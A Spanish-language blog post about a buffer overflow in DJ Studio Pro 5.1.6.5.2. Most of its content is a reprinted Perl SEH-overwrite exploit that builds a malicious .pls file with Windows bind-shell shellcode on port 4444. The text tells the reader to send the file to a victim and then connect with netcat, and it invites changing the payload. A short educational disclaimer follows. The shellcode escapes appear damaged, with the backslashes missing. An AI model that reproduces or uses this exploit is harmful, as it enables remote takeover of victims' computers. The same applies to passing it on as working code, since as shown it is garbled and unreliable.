Como acceder remotamente a un PC con Dj Studio Pro - Vulnerabilidad

Recientemente se descubrio una vulnerabilidad del tipo Buffer Overflow en el software DJ Studio Pro. Esta vulnerabilidad causa que al abrir un archivo este pueda ejecutar código arbitrario en una máquina.

Buffer Overflow Vulnerability in DJ Studio Pro

La vulnerabilidad podría permitir, la inyección de algún Payload, por lo cual, un atacante podría inyectar en un archivo .pls el código de una consola remota, un VNC, o cualquier Payload que le permita tener acceso remoto con el solo hecho de intentar abrir un archivo .pls típico de DJ Studio. un ataque fallido termina en una denegación del Servicio.

La versión vulnerable es la DJ Studio Pro 5.1.6.5.2, aunque otras versiones pueden serlo también. se está a la espera de un parche que corrija el error.

El siguiente es un código perl que genera un archivo .pls con un código para crear una consola remota escuchando en el puerto 4444. el paso siguiente sería envíarselo a la victima esperar a que lo ejecute y usar netcat para conectarse.

#!/usr/bin/perl
# DJ Studio Pro 5.1.6.5.2 SEH Overwrite Exploit
# Written By Rehan Ahmed ( [email protected] )
# Vulnerability Discovered By Prodigy
# Software Link : http://www.e-soft.co.uk/
# Tested on : Windows XP SP2 En
# OSVDB ID : 58159

my $file = "owned.pls";
my $junk = "A" x 1308;
my $nextseh = "xebx06x90x90"; #6 bytes short JMP
my $seh = "x2dxc6x4fx01"; # pop/pop/ret (nosafeseh)
my $nops = "x90" x 20;
my $nops2 = "x90" x 6500;

# Windows Bind Shell 4444 ( 345 Bytes )
my $shellcode =
"xb8x06xa4x4ax21x29xc9xb1x50xdaxc2xd9x74x24xf4" .
"x5ax31x42x10x83xc2x04x03x42x0cxe4x51xb6x4bx03" .
"xd4xafx75x2cx18xd0xe6x59x8bx0bxc3xd6x11x68x80" .
"x94x9cxe8x97x8bx14x47x80xd8x74x78xb1x35xc3xf3" .
"x85x42xd5xedxd7x94x4fx5dx93xd4x04x99x5dx1exe9" .
"xa4x9fx75x06x9dx4bxadxcfx97x96x26x50x7cx58xd3" .
"x09xf7x56x68x5dx58x7bx6fx8ax64xafxe4xc5x07x8b" .
"xe6xb4x14xe2xcdx53x10x46xc1x10x66x45xaax57x7b" .
"xf8x27xd7x8bx5cx5fx56xc5x6ex73x36x25xb8xedxe4" .
"xbfx2dxc2x38x28xd9x57x0fxf7x71x68xbfx6fxb1x7b" .
"xbcx4bx15x7cxebxf3x1cx67x72x8dxf2x6fx79xd8x66" .
"x6dx82x32x1exa8x75x46x72x1dx79x7exdexf2xd6x2c" .
"xb2xb7x8bx91x67xc8xfcx70xe0x27xa1x1axa3xcexb8" .
"x76x2bx74x20x09x6bx23xaax3fx19xdbx05x95x21x0b" .
"xcdxb1x73x85xe7xedx74x0fxa4x44x74x7fx23x82xc3" .
"xf9xfdx1bx2bxd3xaexf7x87x8exb1x28xb4x58xa9xb0" .
"x7dxe1x62xbcx54x44x72x92x3fx0cxe8x75xa8xb3x9d" .
"xf0xcdx59x0ex5ax27x51x27xbbx5dx2dxb1xa6x93x6d" .
"x32x8cx2ax2fx98x2fx90x83x71x42x6fxe3xdexf6x3b" .
"x7bx53xf7x8fx6dx6cx72xb4x6ex44x26x63xc2x38x88" .
"xdax88xbbx7bx8cx19xedx84xfexc9xa0xa2xfaxc7xe8" .
"xabxd3xbdxf1xabxebxbexdexdfx43xbcx5cx1bx0fxc3" .
"xb5xf6x2fxebx52x07x45x0fxfcxb4xa5xd9xfdxebx50";

open($FILE,">$file");
print $FILE $junk.$nextseh.$seh.$nops.$shellcode.$nops2;
close($FILE);

print "owned.pls File Successfully Createdn";

Este es el código del Xploit. se puede modificar el payload, según como se desee.

Para quienes tienen este software se recomienda estar pendientes de actualizaciones.

disclaimer:
La información de este post debe ser usada únicamente de forma educativa, y no dañina. No nos hacemos responsables del mal uso de esta información. El objetivo de este post, y todos los de la sección de Exploits es que los lectores conozcan como trabajan las vulnerabilidades y tomen estrategias para defenderse.

  1. Excellent site. Plenty of useful info here. I'm sending it to several friends ans additionally sharing in delicious. And of course, thanks on your sweat!

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir